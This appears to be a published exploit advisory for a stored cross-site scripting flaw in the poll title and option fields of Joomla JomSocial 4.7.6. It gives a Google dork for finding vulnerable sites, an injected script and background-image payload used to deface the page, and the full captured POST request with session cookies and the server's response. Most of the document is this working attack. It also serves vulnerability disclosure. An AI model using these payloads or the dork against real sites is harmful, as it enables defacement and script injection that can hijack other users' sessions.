# Exploit Title: Joomla JomSocial 4.7.6 Stored XSS
# Date: 03.11.2020
# Author: Vincent666 ibn Winnie
# Software Link: https://www.jomsocial.com/demo
# Tested on: Windows 10
# Web Browser: Mozilla Firefox,Google Chrome and Edge
#:Google Dorks: inurl:templates/jomsocial/
# Blog : https://pentest.vincent.blogspot.com/
# PoC: https://pentestvincent.blogspot.com/2020/11/joomla-jomsocial-476-stored-xss.html

PoC:

Stored XSS in the poll.

Go to the https://ijoomlademo.com/index.php

Create poll:

Use for test simple xss code :

""><script>alert(1)</script><script>alert("2")</script><body
background="https://i.gifer.com/Nv2.gif">

Field "title and field "add poll option".

Update this and we have stored xss and deface background with stored
html code injection.

https://ijoomlademo.com/index.php

Host: ijoomlademo.com

..........................................................................................

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0)
Gecko/20100101 Firefox/82.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate, br

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 1073

Origin: https://ijoomlademo.com

Connection: keep-alive

Referer: https://ijoomlademo.com/index.php

Cookie: __cfduid=dee102cc0e40cf95be92c643956e474cd1604428425;
4681557252fe8ff3df4a28d60cb41dc7=shg4g73pm6odh4e8hfuc4c2h75;
currentURI=https%3A%2F%2Fijoomlademo.com%2Findex.php%3Foption%3Dcom_community%26view%3Dfriends%26task%3DajaxAutocomplete%26allfriends%3D1;
joomla_user_state=logged_in

option=community&view=frontpage&task=azrul_ajax&func=system,ajaxStreamAdd&no_html=1&008b85046025db389f11292741ac0393=1&arg2=["_d_","&quot;&quot;><script>alert(1)</script>"]&arg3=["_d_","{&quot;element&quot;:&quot;profile&quot;,&quot;target&quot;:&quot;231&quot;,&quot;type&quot;:&quot;poll&quot;,&quot;options&quot;:[&quot;1&quot;,&quot;2&quot;],&quot;settings&quot;:{&quot;allow_multiple&quot;:false},&quot;polltime&quot;:{&quot;enddate&quot;:[&quot;2020-11-03&quot;,&quot;3
November 2020&quot;],&quot;endtime&quot;:[&quot;00:00&quot;,&quot;12:00
AM&quot;]},&quot;privacy&quot;:10,&quot;catid&quot;:1}"]&arg4=["_d_","{&quot;filter&quot;:&quot;&quot;,&quot;value&quot;:&quot;default_value&quot;,&quot;hashtag&quot;:false}"]

POST: HTTP/2.0 200 OK

date: Tue, 03 Nov 2020 18:53:21 GMT

content-type: text/plain;charset=UTF-8

x-powered-by: PHP/7.2.33

cf-cache-status: DYNAMIC

cf-request-id: 06310dee9f000033744f1b3000000001

expect-ct: max-age=604800,
report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"

report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=b7CGOI6icRSPny5RypHkJ%2FP%2FfGPQbpAPZalJMzkV6a3yQZwqkqb8tFcZcMnuQNZM45YxUCbr5ZrvHryA0tsZ2qv3NT%2Bh04xxtHJhrpFmcDY%3D"}],"group":"cf-nel","max_age":604800}

nel: {"report_to":"cf-nel","max_age":604800}

server: cloudflare

cf-ray: 5ec84c2a9fd33374-DME

content-encoding: br

X-Firefox-Spdy: h2

..........................................................................................

Picture:

https://imgur.com/a/Cmrcker

https://imgur.com/a/82FhgbW

https://imgur.com/a/mc7bgkN

Video:

https://www.youtube.com/watch?v=brmf-Ew4D3k&feature=youtu.be